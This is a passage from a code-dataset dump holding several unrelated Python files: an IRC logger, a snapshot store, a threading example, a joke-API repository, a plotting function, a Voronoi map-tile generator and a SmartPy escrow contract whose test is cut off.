total_files, surplus_files)\n if surplus_files > 0:\n filenames = filenames[0:surplus_files]\n for filename in filenames:\n os.remove(filename)\n _log.info('Removed file %s', filename)\n\n\n# Protocol functions\ndef _recv(sock):\n buffer = ''\n while True:\n # Check if any data has been received.\n rlist, _, _ = select.select([sock], [], [], 1)\n if len(rlist) == 0:\n yield None\n continue\n\n # If data has been received, validate data length.\n data = sock.recv(1024)\n if len(data) == 0:\n message = 'Received zero-length payload from server'\n _log.error(message)\n raise ValueError(message)\n\n # If there is nonempty data, yield lines from it.\n buffer += data.decode(errors='replace')\n lines = buffer.split('\\r\\n')\n lines, buffer = lines[:-1], lines[-1]\n for line in lines:\n _log.info('recv: %s', line)\n yield line\n\n\ndef _send_message(sock, recipient, message):\n size = 400\n for line in message.splitlines():\n chunks = [line[i:i + size] for i in range(0, len(line), size)]\n for chunk in chunks:\n _send(sock, f'PRIVMSG {recipient} :{chunk}')\n\n\ndef _send(sock, message):\n sock.sendall(message.encode() + b'\\r\\n')\n _log.info('sent: %s', message)\n\n\ndef _parse_line(line):\n # RFC 1459 - 2.3.1\n # ::= [':' ] \n # ::= | [ '!' ] [ '@' ]\n # ::= { } | \n # ::= ' ' { ' ' }\n # ::= [ ':' | ]\n #\n # Example: :alice!Alice@user/alice PRIVMSG #hello :hello\n # Example: PING :foo.example.com\n if line[0] == ':':\n prefix, rest = line[1:].split(maxsplit=1)\n else:\n prefix, rest = None, line\n\n sender, command, middle, trailing = None, None, None, None\n\n if prefix:\n sender = prefix.split('!')[0]\n\n rest = rest.split(None, 1)\n command = rest[0].upper()\n\n if len(rest) == 2:\n params = rest[1]\n params = params.split(':', 1)\n middle = params[0].strip()\n if len(params) == 2:\n trailing = params[1].strip()\n\n return prefix, sender, command, middle, trailing\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"susam/clog","sub_path":"clog.py","file_name":"clog.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13539788432","text":"import threading\nfrom math import inf\nfrom collections import defaultdict\nimport bisect\n\n\nclass SnapshotContainer:\n \"\"\"\n Stores all business properties of an instance of view model\n\n For now similar to a dictionary, but might change to pickledb\n for debugging and testing the code.\n\n \"\"\"\n\n def __init__(self):\n self.d = defaultdict(list)\n self.store = dict()\n self.lock = threading.Lock()\n self._read_times = [(-inf, -inf)]\n\n # def get(self, key):\n # return self.store[key]\n #\n # def set(self, key, val):\n # self.store[key] = val\n\n def set_with_timestamp(self, key: str, val, timestamp: tuple=None) -> None:\n self.store[(timestamp, key)] = val\n self.d[key].append(timestamp)\n # Since the timestamps for all TimeMap.set operations\n # are strictly increasing\n # self.d[key].sort()\n\n def set(self, key: str, val, timestamp: tuple=None) -> None:\n self.store[(timestamp, key)] = val\n self.d[key].append(timestamp)\n # Since the timestamps for all TimeMap.set operations\n # are strictly increasing\n # self.d[key].sort()\n\n def has_previous(self, key: str):\n return len(self.d[key]) != 0\n\n def previous(self, key):\n ts = self.d[key][-1]\n return self.store[(ts, key)]\n\n def get(self, key: str, timestamp: tuple=None):\n if timestamp is None:\n return self.store[(timestamp, key)]\n\n idx = bisect.bisect_right(self.d[key], 
timestamp)\n        if idx == 0:\n            raise AttributeError\n        else:\n            ts = self.d[key][idx - 1]\n            return self.store[(ts, key)]\n\n    def get_with_range(self, key, lo_excl=(-inf,-inf), hi_incl=(inf,inf)):\n        \"\"\" NOTE: low is exclusive and high is inclusive (different from range)\n\n        :param key:\n        :param lo_excl:\n        :param hi_incl:\n        :return:\n        \"\"\"\n        start_idx = bisect.bisect_right(self.d[key], lo_excl)\n        end_idx = bisect.bisect_right(self.d[key], hi_incl)\n        for ts in self.d[key][start_idx:end_idx]:\n            yield self.store[(ts, key)]\n","repo_name":"billyrrr/onto","sub_path":"onto/store/snapshot_container.py","file_name":"snapshot_container.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"66"} +{"seq_id":"21733079203","text":"import Zadania.Library.library as Library\nimport time\nimport datetime\nimport threading, queue\n#Library.TFIDF(\"../teksty/papk.txt\")\ndef log(message):\n    now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n    print(\"%s %s\" % (now, message))\n\ndef oblicz(x):\n    time.sleep(x)\n    return x * x\n\n# Threads in the pool wait for tasks on the ``kolejka_zadan`` queue\nclass WatekOblicz(threading.Thread):\n    def __init__(self, id, kolejka_zadan):\n        threading.Thread.__init__(self, name=\"WatekOblicz-%d\" % (id,))\n        self.kolejka_zadan = kolejka_zadan\n    def run(self):\n        while True:\n            # the thread blocks until something arrives in the queue\n            req = self.kolejka_zadan.get()\n            if req is None:\n                # nothing left to process, so we finish\n                self.kolejka_zadan.task_done()\n                break\n            value, kolejka_rezultatow = req\n            result = oblicz(value)\n            log(\"%s %s -> %s\" % (self.getName(), value, result))\n            kolejka_rezultatow.put(result)\n            self.kolejka_zadan.task_done()\n\n\n\ndef threaded_sum(values, kolejka_zadan):\n    nsum = 0.0\n    kolejka_rezultatow = queue.Queue()\n    for value in values:\n        kolejka_zadan.put((value, kolejka_rezultatow))\n    # collect the results; responses need not arrive in the same order as the requests!\n    # using \"_\" is a convention meaning \"this variable's value does not interest me\"\n    for _ in values:\n        nsum += kolejka_rezultatow.get()\n    return nsum\n\ndef main():\n    kolejka_zadan = queue.Queue()\n    log(\"uruchamiam watek glowny\")\n    # initialize the thread pool with three \"compute\" threads\n    N_liczba_watkow = 3\n    for i in range(N_liczba_watkow):\n        WatekOblicz(i, kolejka_zadan).start()\n\n    # submit 5 tasks\n    result = threaded_sum( (4, 5, 3, 1.5, 2.2), kolejka_zadan )\n    log(\"suma wynosi: %f\" % (result,))\n\n    # send a shutdown request to every thread\n    for i in range(N_liczba_watkow):\n        kolejka_zadan.put(None)\n    kolejka_zadan.join()\n    log(\"koniec watku glownego.\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Peggaz/ZTP","sub_path":"Zadania/testRozwiazan/wąteki-test.py","file_name":"wąteki-test.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2930676050","text":"from Infrastructure.Entities.Core.Chistes import Chistes, chistes_schema\nfrom Infrastructure.Repositories.RepositoryBase import RepositoryBase\nfrom Infrastructure.Repositories.Complements.Utils import *\nfrom sqlalchemy import func\nimport datetime\nimport logging\nimport requests\nfrom settings import create_app, ENVIRONMENT_NAME\n\napp = create_app(ENVIRONMENT_NAME)\n\nWEAPI_CHUCKNORRIS = app.config[\"WEAPI_CHUCKNORRIS\"]\nWEAPI_JOKE = 
app.config[\"WEAPI_JOKE\"]\nVERIFY_SSL = app.config[\"VERIFY_SSL\"]\n\n\ndef get_info(i, name):\n    if name == 'chuck':\n        return {\n            'id': i['id'],\n            'descripcion' : i['value']\n        }\n    elif name == 'joke':\n        return {\n            'id': i['id'],\n            'descripcion' : i['joke']\n        }\n    \ndef get_json(i,type_dict):\n    \n    summary_schema=chistes_schema(many=type_dict,only=(\n        \"id\",\n        \"descripcion\"\n        )\n    )\n    \n    return summary_schema.dump(i)\n\nclass ChistesRepository(RepositoryBase):\n    db = None\n\n    def __init__(self, db):\n        self.db = db\n        super().__init__(db, entity_base=Chistes, entity_name='Chistes')\n\n    def get_api_chucknorris(self):\n        try:\n            url = WEAPI_CHUCKNORRIS + f'/random'\n            headers = {'content-type': 'application/json'}\n            \n            r = requests.get(url, headers=headers, verify=VERIFY_SSL)\n            if r.status_code not in (200, 201):\n                return None\n            re = r.json() \n            row = get_info(re, name = 'chuck')\n            return row\n        except Exception as e:\n            print(e)\n            return None\n    \n    def get_api_joke(self):\n        try:\n            url = WEAPI_JOKE\n            headers = {'Accept': 'application/json'}\n            \n            r = requests.get(url, headers=headers, verify=VERIFY_SSL)\n            if r.status_code not in (200, 201):\n                return None\n            re = r.json()\n\n            row = get_info(re, name = 'joke')\n            return row\n        except Exception as e:\n            print(e)\n            return None\n    \n    def get_by_id(self, id):\n        try:\n            query = self.session().query(Chistes).filter_by(id=id,vigente=True).first()\n            if query is None:\n                return None\n            return get_json(query,False)\n        except Exception as e:\n            print(e)\n            self.session().rollback()\n            raise\n        finally:\n            self.session().close()\n    \n    def get_all(self):\n        try:\n            query = self.session().query(Chistes).filter(Chistes.vigente == True).all()\n            return get_json(query,True)\n        except Exception as e:\n            print(e)\n            self.session().rollback()\n            return None\n        finally:\n            self.session().close()\n\n    def get_by_element(self, id):\n        try:\n            return self.session().query(Chistes).filter_by(id=id, vigente=True).first()\n        except Exception as e:\n            raise e\n        finally:\n            self.session().close()\n\n    def insert(self, item):\n        try:\n            self.session().add(item)\n            self.session().commit()\n            self.session().refresh(item)\n            return get_json(item,False)\n        except Exception as e:\n            print(e)\n            self.session().rollback()\n            return None\n        finally:\n            self.session().close()\n\n    def update(self, item):\n        try:\n            super().update(serialize(item),item.id)\n            return True\n        except Exception as e:\n            print(e)\n            self.session().rollback()\n            raise\n        finally:\n            self.session().close()\n    \n\n    def disabled(self, id):\n        try:\n            self.session().query(self.entity_base).filter_by(id_lego_convivencia=id).update({'vigente': False})\n            self.session().commit()\n            return True\n        except Exception as e:\n            self.session().rollback()\n            raise\n        finally:\n            self.session().close()\n","repo_name":"Luis-Santiago93/reto-back-python","sub_path":"Infrastructure/Repositories/ChistesRepository.py","file_name":"ChistesRepository.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1883636525","text":"def AreaLosses(mirror, blkFlag=True, printFigs=False):\n    \"\"\"Plot AreaLosses of given mirror areas\"\"\"\n    import matplotlib.pyplot as plt\n    import numpy as np\n\n    mir = mirror\n    ### Plot Area Change in Losses over time\n    mins = np.array(mir.r_t)/60.0\n    minEnd = max(mins)\n    caseName = mir.simParams['fileName'][:-1]\n    
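# 'mini' below divides the figure width used in fig.set_size_inches(9/mini, 2.5); leaving it at 1 keeps the full 9-inch width\n    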
mini = 1\n\n fig, ax = plt.subplots()\n for area in mir.Area:\n ax.plot(mins, np.array(area.r_Losses)-area.r_Losses[0], linewidth=1.25,#linestyle=\":\",\n label= 'Area '+ str(area.Area)+', Norm: '+ str(int(area.r_Losses[0])))\n\n # Scale current axis.\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1.05, box.height])\n\n # Put a legend to the right of the current axis\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n ax.set_title('Area Change in Losses\\n Case: ' + caseName)\n ax.set_xlim(0,minEnd)\n ax.set_ylabel('MW')\n ax.set_xlabel('Time [minutes]')\n\n #ax.legend(loc=0)\n ax.grid(True)\n fig.set_dpi(150)\n fig.set_size_inches(9/mini, 2.5)\n fig.tight_layout()\n if printFigs: plt.savefig(caseName+'AreaLosses'+'.pdf', dpi=300)\n plt.show(block=blkFlag)\n plt.pause(0.00001)","repo_name":"thadhaines/PSLTDSim","sub_path":"psltdsim/plot/AreaLosses.py","file_name":"AreaLosses.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10340412716","text":"import math\nimport os\nimport random\nimport re\nimport subprocess\n\nfrom PIL import Image, ImageDraw\n\nimport bdgmath\n\n\"\"\"\ncollects city data from state protocol buffer files, \nsorts city by population,\ncreates a bridson blue noise map starting with cities, populating with point spacing 1.0\ngenerates tile polygons using voronoi\n\nreads: OSM/*-latest.osm.pbf\nwrites: \n map.png\n Tiles/voronoi.json\n Tiles/tile_*.json\n\"\"\"\n\n# from pyrosm import get_data\n\n# rainbow\n# west_limit = -123\n# east_limit = -122\n# north_limit = 48\n# south_limit = 47\n\n# washington\n# west_limit = -125\n# east_limit = -116\n# north_limit = 49\n# south_limit = 46\n\n# sea->bos\nwest_limit = -125\neast_limit = -65\nnorth_limit = 49\nsouth_limit = 40\n\n# continental US\nwest_limit = -125\neast_limit = -65\nnorth_limit = 49\nsouth_limit = 25\n\nstateToAbbrevDict = {\n \"Alabama\": \"AL\",\n \"Alaska\": \"AK\",\n \"Arizona\": \"AZ\",\n \"Arkansas\": \"AR\",\n \"California\": \"CA\",\n \"Colorado\": \"CO\",\n \"Connecticut\": \"CT\",\n \"Delaware\": \"DE\",\n \"Florida\": \"FL\",\n \"Georgia\": \"GA\",\n \"Hawaii\": \"HI\",\n \"Idaho\": \"ID\",\n \"Illinois\": \"IL\",\n \"Indiana\": \"IN\",\n \"Iowa\": \"IA\",\n \"Kansas\": \"KS\",\n \"Kentucky\": \"KY\",\n \"Louisiana\": \"LA\",\n \"Maine\": \"ME\",\n \"Maryland\": \"MD\",\n \"Massachusetts\": \"MA\",\n \"Michigan\": \"MI\",\n \"Minnesota\": \"MN\",\n \"Mississippi\": \"MS\",\n \"Missouri\": \"MO\",\n \"Montana\": \"MT\",\n \"Nebraska\": \"NE\",\n \"Nevada\": \"NV\",\n \"New Hampshire\": \"NH\",\n \"New Jersey\": \"NJ\",\n \"New Mexico\": \"NM\",\n \"New York\": \"NY\",\n \"North Carolina\": \"NC\",\n \"North Dakota\": \"ND\",\n \"Ohio\": \"OH\",\n \"Oklahoma\": \"OK\",\n \"Oregon\": \"OR\",\n \"Pennsylvania\": \"PA\",\n \"Rhode Island\": \"RI\",\n \"South Carolina\": \"SC\",\n \"South Dakota\": \"SD\",\n \"Tennessee\": \"TN\",\n \"Texas\": \"TX\",\n \"Utah\": \"UT\",\n \"Vermont\": \"VT\",\n \"Virginia\": \"VA\",\n \"Washington\": \"WA\",\n \"West Virginia\": \"WV\",\n \"Wisconsin\": \"WI\",\n \"Wyoming\": \"WY\",\n}\n\n\nclass State:\n def __init__(self, name, osm_filename=None):\n self.name = name.title().replace(\"-\", \" \")\n self.abbrev = stateToAbbrevDict[self.name]\n self.osm_filename = osm_filename\n if osm_filename is None:\n self.osm_filename = self.name.lower().replace(\" \", \"-\")\n\n def __lt__(self, o):\n return self.name < o.name\n\n\ndef 
make_rainbow():\n states = [\"rainbow.pbf\"]\n return states\n\n\ndef make_sea_to_bos():\n # sea->bos states\n\n states = [\n \"washington\",\n \"idaho\",\n # \"montana\",\n # \"north-dakota\",\n # \"minnesota\",\n # \"wisconsin\",\n # \"illinois\",\n # \"indiana\",\n # \"ohio\",\n # \"pennsylvania\",\n # \"new-york\",\n # \"massachusetts\"\n ]\n\n return [State(s) for s in states]\n\n\ndef make_continental_us():\n # all continental US states\n\n states = [\n \"Alabama\",\n # \"Alaska\",\n \"Arizona\",\n \"Arkansas\",\n # \"California\",\n \"Colorado\",\n \"Connecticut\",\n \"Delaware\",\n \"Florida\",\n \"Georgia\",\n # \"Hawaii\",\n \"Idaho\",\n \"Illinois\",\n \"Indiana\",\n \"Iowa\",\n \"Kansas\",\n \"Kentucky\",\n \"Louisiana\",\n \"Maine\",\n \"Maryland\",\n \"Massachusetts\",\n \"Michigan\",\n \"Minnesota\",\n \"Mississippi\",\n \"Missouri\",\n \"Montana\",\n \"Nebraska\",\n \"Nevada\",\n \"New Hampshire\",\n \"New Jersey\",\n \"New Mexico\",\n \"New York\",\n \"North Carolina\",\n \"North Dakota\",\n \"Ohio\",\n \"Oklahoma\",\n \"Oregon\",\n \"Pennsylvania\",\n \"Rhode Island\",\n \"South Carolina\",\n \"South Dakota\",\n \"Tennessee\",\n \"Texas\",\n \"Utah\",\n \"Vermont\",\n \"Virginia\",\n \"Washington\",\n \"West Virginia\",\n \"Wisconsin\",\n \"Wyoming\",\n ]\n\n states = [State(s) for s in states] + [\n State(\"California\", \"norcal\"),\n State(\"California\", \"socal\"),\n ]\n\n states.sort()\n\n return states\n\n\nif True:\n states = make_continental_us()\nelse:\n states = make_sea_to_bos()\n\nrel_path = \"OSM\"\nsuffix = \"-latest.osm.pbf\"\n# suffix = \"\"\n\nIM_WIDTH = 6000\nIM_HEIGHT = 3500\n\n\ndef bdg_map(v, in_min, in_max, out_min, out_max):\n f = (v - in_min) / (in_max - in_min)\n return out_min + f * (out_max - out_min)\n\n\nim = Image.new(\"RGB\", (IM_WIDTH, IM_HEIGHT), (128, 200, 128))\ndraw = ImageDraw.Draw(im)\n\n\nclass City:\n def __init__(self, name, state_name, lat, lon, pop):\n self.name = name\n self.state_name = state_name\n self.lat = lat\n self.lon = lon\n self.pop = pop\n\n def __lt__(self, o):\n return self.pop < o.pop\n\n def __str__(self):\n return \"%s, %s (%f, %f) p: %d\" % (\n self.name,\n self.state_name,\n self.lat,\n self.lon,\n self.pop,\n )\n\n def __repr__(self):\n return str(self)\n\n def dist(self, other):\n return bdgmath.haversine_distance_deg(self.lat, self.lon, other.lat, other.lon)\n\n\ncities = []\n\nfor s in states:\n im.save(\"map.png\")\n\n print(\"state: %s (%s)\" % (s.name, s.abbrev))\n\n # fp = get_data(s, directory=rel_path)\n\n p = os.path.join(rel_path, s.osm_filename + suffix)\n\n print(p)\n\n cmd = \"./DrawMap/drawmap/target/release/drawmap \" + p\n print(cmd)\n\n proc = subprocess.run(cmd.split(), capture_output=True)\n\n print(\"returncode:\", proc.returncode)\n\n out_lines = str(proc.stdout, \"UTF-8\").split(\"\\n\")\n # for o in out_lines:\n # print(o)\n\n color = (255, 0, 0)\n\n if proc.returncode == 0:\n state_cities = []\n\n for line in out_lines:\n # print(line)\n if line.startswith(\"Found a city:\"):\n # print(line)\n m = re.search(\n 'name=\"([A-Za-z ]+)\" lat=([0-9\\.-]*), lon=([0-9\\.-]*), population=([0-9]+)',\n line,\n )\n # print (\"city match?\", m)\n if m:\n # print(m[1])\n # print(m[2])\n # print(m[3])\n # print(m[4])\n\n name = m[1]\n lat = float(m[2])\n lon = float(m[3])\n pop = int(m[4])\n\n city = City(name, s.name, lat, lon, pop)\n state_cities.append(city)\n print(\"city:\", city)\n\n if line == \"highway\":\n color = (64, 64, 64)\n # print(\"got hwy\")\n if line == \"Found a boundary\":\n 
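# dark blue tags boundary ways; the \"pl:\" handler below skips polylines drawn in this color\n                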
color = (0, 0, 128)\n # print(\"got boundary\")\n if line.startswith(\"pl:\"):\n coords = []\n\n if color == (0, 0, 128):\n continue\n\n if \"[\" in line and \"]\" in line:\n left = line.index(\"[\")\n right = line.index(\"]\")\n line = line[left + 1 : right]\n # print (\"stripped line:\", line)\n\n while line:\n if \"(\" in line and \")\" in line:\n left = line.index(\"(\")\n right = line.index(\")\")\n coord_str = line[left + 1 : right]\n # print (\"found coord\", coord_str)\n line = line[right + 1 :]\n\n terms = coord_str.split(\",\")\n coords.append((float(terms[0]), float(terms[1])))\n else:\n break\n\n # print(\"parsed coords:\", coords)\n\n im_coords = []\n for c in coords:\n c_lat, c_lon = c\n ix = bdg_map(c_lon, west_limit, east_limit, 0, IM_WIDTH)\n iy = bdg_map(c_lat, north_limit, south_limit, 0, IM_HEIGHT)\n im_coords.append((ix, iy))\n\n # print(\"drawing\", im_coords)\n\n draw.line(im_coords, fill=color, width=2)\n # exit(-1)\n\n for sc in state_cities:\n ix = bdg_map(sc.lon, west_limit, east_limit, 0, IM_WIDTH)\n iy = bdg_map(sc.lat, north_limit, south_limit, 0, IM_HEIGHT)\n\n radius = 3.5\n\n draw.ellipse(\n (ix - radius, iy - radius, ix + radius, iy + radius),\n fill=(255, 192, 0),\n )\n cities.append(sc)\n\n else:\n print(\"error\")\n err_lines = str(proc.stderr, \"UTF-8\").split(\"\\n\")\n for e in err_lines:\n print(\"ERR: \", e)\n\ncities.sort()\ncities = cities[::-1]\n\nprint()\nprint()\n\nfor ci, c in enumerate(cities):\n print(ci, c)\n\nim.save(\"map.png\")\n\n\n# ----------------------------------------\n# Bridsonize\n# ----------------------------------------\n\ngrid = {}\n\npoint_spacing = 1.0\n\ncell_size = point_spacing / math.sqrt(2.0)\n\n\ndef lat_lon_to_index(lat, lon):\n ix = math.floor((lon - west_limit) / cell_size)\n iy = math.floor((lat - south_limit) / cell_size)\n\n return (ix, iy)\n\n\ndef can_insert(lat, lon):\n if (\n (lon < west_limit)\n or (lon > east_limit)\n or (lat < south_limit)\n or (lat > north_limit)\n ):\n return False\n\n ix, iy = lat_lon_to_index(lat, lon)\n\n for dx in range(-2, 3):\n px = ix + dx\n for dy in range(-2, 3):\n py = iy + dy\n\n probe_key = (px, py)\n if probe_key in grid:\n g_lat, g_lon = grid[probe_key]\n\n d_lat = lat - g_lat\n d_lon = lon - g_lon\n\n # dist = math.sqrt(d_lat * d_lat + d_lon * d_lon)\n dist = bdgmath.haversine_distance_deg(lat, lon, g_lat, g_lon)\n\n if dist <= point_spacing:\n return False\n return True\n\n\nopen_points = []\nadded_points = []\n\nfor c in cities:\n if can_insert(c.lat, c.lon):\n ci = lat_lon_to_index(c.lat, c.lon)\n grid[ci] = (c.lat, c.lon)\n print(\"inserted\", c)\n open_points.append((c.lat, c.lon))\n added_points.append((c.lat, c.lon))\n\nk = 30\n\nwhile open_points:\n p_lat, p_lon = open_points[0]\n open_points = open_points[1:]\n\n p = (p_lat, p_lon)\n\n # print(\"examining\", p)\n\n seed = random.random()\n epsilon = 0.000001\n\n inserted = False\n\n for j in range(k):\n # theta = 2 * math.pi * (seed + float(j) / k)\n heading = 360.0 * (seed + float(j) / k)\n\n r = point_spacing + epsilon\n # new_lat = p_lat + r * math.sin(theta)\n # new_lon = p_lon + r * math.cos(theta)\n new_lat, new_lon = bdgmath.haversine_offset_deg(p_lat, p_lon, heading, r)\n\n if can_insert(new_lat, new_lon):\n ni = lat_lon_to_index(new_lat, new_lon)\n grid[ni] = (new_lat, new_lon)\n open_points.append((new_lat, new_lon))\n inserted = True\n # print(\"inserted new point\", new_lat, new_lon)\n added_points.append((new_lat, new_lon))\n\n # --- draw ---\n\n ix = bdg_map(new_lon, west_limit, east_limit, 0, 
IM_WIDTH)\n iy = bdg_map(new_lat, north_limit, south_limit, 0, IM_HEIGHT)\n\n radius = 3.5\n\n draw.ellipse(\n (ix - radius, iy - radius, ix + radius, iy + radius),\n fill=(0, 0, 64),\n )\n\n\nim.save(\"map.png\")\n\n# ----------------------------------------\n# voronoi\n# ----------------------------------------\n# see https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.Voronoi.html\n\nimport numpy as np\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\n\nxys = [(p[1], p[0]) for p in added_points]\n# make up data points\npoint_array = np.array(xys)\n\n# compute Voronoi tesselation\nvor = Voronoi(point_array)\n\nprint(\"points:\", vor.points)\nprint(\"vertices:\", vor.vertices)\n\n# write json\nimport json\nimport glob\nimport os\n\nfor fn in glob.glob(\"Tiles/*.json\"):\n os.unlink(fn)\n\nwith open(\"Tiles/voronoi.json\", \"wt\") as vf:\n data = {}\n\n point_list = []\n for pi, p in enumerate(vor.points):\n point_list.append({\"lat\": p[1], \"lon\": p[0], \"point_index\": pi})\n data[\"points\"] = point_list\n\n vert_list = []\n for pi, p in enumerate(vor.vertices):\n vert_list.append({\"lat\": p[1], \"lon\": p[0], \"vert_index\": pi})\n data[\"vertices\"] = vert_list\n\n region_list = []\n for ri, r in enumerate(vor.regions):\n if -1 in r:\n continue\n\n if len(r) == 0:\n continue\n\n r_data = {\"vert_indices\": r, \"region_index\": ri}\n region_list.append(r_data)\n data[\"regions\"] = region_list\n\n vf.write(json.dumps(data, indent=2))\n\n# make tile objects\nimport tile\nimport point\n\nprint(\"going to try to save %d regions\" % len(vor.regions))\nprint(\"I have %d points\" % len(vor.points))\n\nregion_to_point_map = {}\nfor pi in range(len(vor.points)):\n ri = vor.point_region[pi]\n region_to_point_map[ri] = pi\n\n\ntiles = []\n\nfor ri, r in enumerate(vor.regions):\n if -1 in r:\n continue\n if len(r) == 0:\n continue\n\n if ri not in region_to_point_map:\n print(\"error, running off end of points\")\n break\n\n t = tile.Tile()\n pi = region_to_point_map[ri]\n p = vor.points[pi]\n tile_centroid = point.Point(p[1], p[0], None, None)\n t.centroid_lat_lon = tile_centroid\n t.tile_id = pi\n\n verts = []\n for vi in r:\n p = vor.vertices[vi]\n pt = point.Point(p[1], p[0], None, None)\n verts.append(pt)\n t.verts_lat_lon = verts\n t.make_bbox_lat_lon()\n\n # todo more population\n\n tiles.append(t)\n\nfor c in cities:\n for t in tiles:\n if t.point_in_tile_lat_lon(c.lat, c.lon):\n t.city_list.append(c.name)\n if c.state_name not in t.state_list:\n t.state_list.append(c.state_name)\n t.state_list.sort()\n\nfor t in tiles:\n fn = \"Tiles/tile_%04d.json\" % (t.tile_id)\n t.to_json(fn)\n\nfor region in vor.regions:\n if -1 in region:\n continue\n\n polygon = [vor.vertices[i] for i in region]\n\n for i in range(len(polygon)):\n j = i - 1\n\n x1, y1 = polygon[i]\n x2, y2 = polygon[j]\n\n i_x1 = bdg_map(x1, west_limit, east_limit, 0, IM_WIDTH)\n i_y1 = bdg_map(y1, north_limit, south_limit, 0, IM_HEIGHT)\n i_x2 = bdg_map(x2, west_limit, east_limit, 0, IM_WIDTH)\n i_y2 = bdg_map(y2, north_limit, south_limit, 0, IM_HEIGHT)\n\n try:\n draw.line((i_x1, i_y1, i_x2, i_y2), fill=(255, 20, 20), width=3)\n except ValueError as ve:\n print(\"value error drawing line\", i_x1, i_y1, i_x2, i_y2)\n\n\nim.save(\"map.png\")\n","repo_name":"tsmaster/BigMesh","sub_path":"makevoronoitiles.py","file_name":"makevoronoitiles.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"9435547825","text":"# Escrow - Example for illustrative purposes only.\r\n\r\nimport smartpy as sp\r\n\r\nclass Escrow(sp.Contract):\r\n #Modified\r\n def __init__(self, owner, fromOwner, counterparty, fromCounterparty, epoch, hashedSecret, admin):\r\n self.init(fromOwner = fromOwner,\r\n fromCounterparty = fromCounterparty,\r\n balanceOwner = sp.tez(0),\r\n balanceCounterparty = sp.tez(0),\r\n hashedSecret = hashedSecret,\r\n epoch = epoch,\r\n owner = owner,\r\n counterparty = counterparty,\r\n admin = admin,\r\n withdrawalAuthorized = sp.bool(False),\r\n withdrawOwner = sp.bool(False),\r\n withdrawCounterparty = sp.bool(False))\r\n\r\n #Modified\r\n @sp.entry_point\r\n def addBalanceOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n sp.verify(self.data.balanceOwner == sp.tez(0), \"OWNER HAS ALREADY ADDED BALANCE\")\r\n sp.verify(sp.amount == self.data.fromOwner)\r\n self.data.balanceOwner = self.data.fromOwner\r\n\r\n #Modified\r\n @sp.entry_point\r\n def addBalanceCounterparty(self):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n sp.verify(self.data.balanceCounterparty == sp.tez(0), \"COUNTERPARTY HAS ALREADY ADDED BALANCE\")\r\n sp.verify(sp.amount == self.data.fromCounterparty)\r\n self.data.balanceCounterparty = self.data.fromCounterparty\r\n\r\n def claim(self, identity):\r\n sp.verify(sp.sender == identity)\r\n sp.send(identity, self.data.balanceOwner + self.data.balanceCounterparty)\r\n self.data.balanceOwner = sp.tez(0)\r\n self.data.balanceCounterparty = sp.tez(0)\r\n\r\n #Modified\r\n @sp.entry_point\r\n def claimCounterparty(self, params):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n sp.verify(sp.now < self.data.epoch)\r\n sp.verify(self.data.hashedSecret == sp.blake2b(params.secret))\r\n self.claim(self.data.counterparty)\r\n\r\n #Modified\r\n @sp.entry_point\r\n def claimOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n sp.verify(self.data.epoch < sp.now)\r\n self.claim(self.data.owner)\r\n\r\n #Added\r\n @sp.entry_point\r\n def revertOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n self.data.withdrawOwner = sp.bool(True)\r\n\r\n #Added\r\n @sp.entry_point\r\n def revertCounterparty(self):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n self.data.withdrawCounterparty = sp.bool(True)\r\n \r\n #Added\r\n @sp.entry_point\r\n def revertFunds(self):\r\n sp.verify(sp.sender == self.data.admin, \"NOT AUTHORIZED: ESCROW ADMIN ONLY\")\r\n sp.verify(self.data.withdrawOwner, \"OWNER MUST AGREE TO WITHDRAW FROM CONTRACT\")\r\n sp.verify(self.data.withdrawCounterparty, \"COUNTERPARTY MUST AGREE TO WITHDRAW FROM CONTRACT\")\r\n \r\n self.data.withdrawalAuthorized = sp.bool(True)\r\n sp.send(self.data.owner, self.data.balanceOwner)\r\n sp.send(self.data.counterparty, self.data.balanceCounterparty)\r\n self.data.balanceOwner = sp.tez(0)\r\n self.data.balanceCounterparty = sp.tez(0)\r\n \r\n\r\n@sp.add_test(name = \"Escrow\")\r\ndef test():\r\n scenario = sp.test_scenario()\r\n scenario.h1(\"Escrow\")\r\n hashSecret = sp.blake2b(sp.bytes(\"0x01223344\"))\r\n alice = sp.test_account(\"Alice\")\r\n bob = sp.test_account(\"Bob\")\r\n admin = sp.test_account(\"Admin\")\r\n c1 = Escrow(alice.address, sp.tez(50), bob.address, sp.tez(4), sp.timestamp(123), hashSecret, 
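# positional args: owner, fromOwner, counterparty, fromCounterparty, epoch, hashedSecret, admin\r\n 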
